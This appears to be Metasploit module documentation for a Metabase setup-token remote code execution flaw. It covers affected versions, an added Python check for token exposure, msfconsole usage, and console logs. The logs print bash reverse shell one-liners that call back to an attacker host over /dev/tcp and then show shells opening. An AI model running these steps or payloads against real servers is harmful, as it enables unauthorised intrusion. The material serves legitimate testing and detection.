## Vulnerable Application

Metabase versions before 0.46.6.1 contain a flaw where the secret setup token
remains accessible even after the setup process has completed. An unauthenticated
user who holds this token can call the setup functionality to add a new database.
The module supplies an H2 connection string that defines a TRIGGER, which allows
code execution. The connection string points at the bundled sample database so
that no real database is corrupted.
Successfully tested against Metabase 0.46.6, 0.44.4, 0.42.1.
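The check the module runs before exploiting (version detection plus the leaked setup token, as seen in the `[+] Found setup token` lines below) can be reproduced without Metasploit. The following is an added example, not code from the module or from Metabase. It assumes that the token and version are read from Metabase's unauthenticated `GET /api/session/properties` endpoint, under the JSON keys `setup-token` and `version.tag`; the sample responses are constructed for offline use, and the version range is the one the page states (open-source 0.x tags before 0.46.6.1), with other major numbers reported as undetermined rather than guessed.

```python
"""Added check (not the Metasploit module's code): does a Metabase instance
still expose its setup token after setup, and is its version in the range
the page describes (before 0.46.6.1)?

Assumptions not stated on the page: the token and version are read from the
unauthenticated GET /api/session/properties endpoint, where they appear under
the JSON keys "setup-token" and "version"."tag".
"""
import json
import urllib.request

PROPERTIES_PATH = "/api/session/properties"   # assumed endpoint
FIXED_VERSION = (0, 46, 6, 1)                 # first fixed release per the page


def parse_version(tag):
    """Turn a tag such as 'v0.46.6' or '0.46.6.1' into a tuple of ints.

    Any suffix after a '-' (e.g. '-SNAPSHOT') is dropped. A shorter tuple
    sorts before a longer one with the same prefix, so (0,46,6) < (0,46,6,1).
    """
    core = tag.strip().lstrip("v").split("-")[0]
    return tuple(int(p) for p in core.split(".") if p.isdigit())


def version_in_affected_range(tag):
    """True/False for open-source (0.x) tags; None when undetermined.

    Tags with another major number, or no parsable number at all, fall
    outside the range the page states, so they are reported as None and
    should be confirmed by hand rather than guessed at.
    """
    parsed = parse_version(tag)
    if not parsed or parsed[0] != 0:
        return None
    return parsed < FIXED_VERSION


def assess(properties):
    """Return (vulnerable, setup_token, version_tag) for a decoded
    session-properties document.

    Both indicators must hold: a non-empty setup token (a fixed instance no
    longer exposes it once setup has completed) and an affected version.
    """
    token = properties.get("setup-token")
    tag = (properties.get("version") or {}).get("tag", "")
    vulnerable = bool(token) and version_in_affected_range(tag)
    return vulnerable, token, tag


def fetch_properties(base_url, timeout=10):
    """GET the properties document from a live instance."""
    req = urllib.request.Request(
        base_url.rstrip("/") + PROPERTIES_PATH,
        headers={"Accept": "application/json"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return json.load(resp)


# Constructed sample responses (not captured from a real server) so the check
# runs offline. The token value is the one shown in the 0.42.1 scenario.
SAMPLE_VULNERABLE = {
    "setup-token": "e02ce681-0cf7-416f-a205-75656b168b4c",
    "version": {"tag": "v0.42.1"},
}
SAMPLE_FIXED = {
    # a patched instance omits the token once setup has completed
    "version": {"tag": "v0.46.6.1"},
}

if __name__ == "__main__":
    import sys
    props = fetch_properties(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_VULNERABLE
    vuln, token, tag = assess(props)
    verdict = "VULNERABLE" if vuln else ("undetermined" if vuln is None else "not affected")
    print(f"version={tag or '?'} setup-token={'present' if token else 'absent'} -> {verdict}")
```

Run it with a base URL (`python3 check.py http://127.0.0.1:3000`) to query a live instance, or with no argument to see the verdict on the constructed sample. A token that is still present after setup is the primary indicator; the version comparison only scopes it to the range the page describes.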
### Install
Example of impacted versions:
```
docker run --rm -p 3000:3000 --name metabase metabase/metabase:v0.46.6
docker run --rm -p 3000:3000 --name metabase metabase/metabase:v0.44.4
docker run --rm -p 3000:3000 --name metabase metabase/metabase:v0.42.1
```
## Verification Steps
1. Install the application
1. Start msfconsole
1. Do: `use exploit/linux/http/metabase_setup_token_rce`
1. Do: `set rhosts [ip]`
1. Do: `run`
1. You should get a shell.
## Options
## Scenarios
### Metabase 0.42.1 on Docker
```
msf exploit(linux/http/metabase_setup_token_rce) > run rhost=192.168.123.1 lhost=192.168.123.1 rport=3000
[*] Reloading module...
[+] bash -c '0<&30-;exec 30<>/dev/tcp/192.168.123.1/4444;sh <&30 >&30 2>&30'
[*] Started reverse TCP handler on 192.168.123.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version Detected: 0.42.1
[+] Found setup token: e02ce681-0cf7-416f-a205-75656b168b4c
[*] Sending exploit (may take a few seconds)
[*] Command shell session 1 opened (192.168.123.1:4444 -> 192.168.123.1:58422) at 2024-10-17 09:59:25 +0100

whoami
metabase
```
### Metabase 0.46.6 on Docker
```
msf > use exploit/linux/http/metabase_setup_token_rce
[*] Using configured payload cmd/unix/reverse_bash
msf exploit(linux/http/metabase_setup_token_rce) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf exploit(linux/http/metabase_setup_token_rce) > set lhost 111.111.11.111
lhost => 111.111.11.111
msf exploit(linux/http/metabase_setup_token_rce) > set verbose true
verbose => true
msf exploit(linux/http/metabase_setup_token_rce) > exploit

[+] bash -c '0<&46-;exec 46<>/dev/tcp/111.111.11.111/4444;sh <&46 >&46 2>&46'
[*] Started reverse TCP handler on 111.111.11.111:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version Detected: 0.46.6
[+] Found setup token: 45a2c97a-97f5-4a89-8f37-769b13411d16
[*] Sending exploit
[*] Command shell session 1 opened (111.111.11.111:4444 -> 222.22.2.2:55650) at 2023-07-28 12:48:47 +0000

id
uid=2000(metabase) gid=2000(metabase) groups=2000(metabase),2000(metabase)
```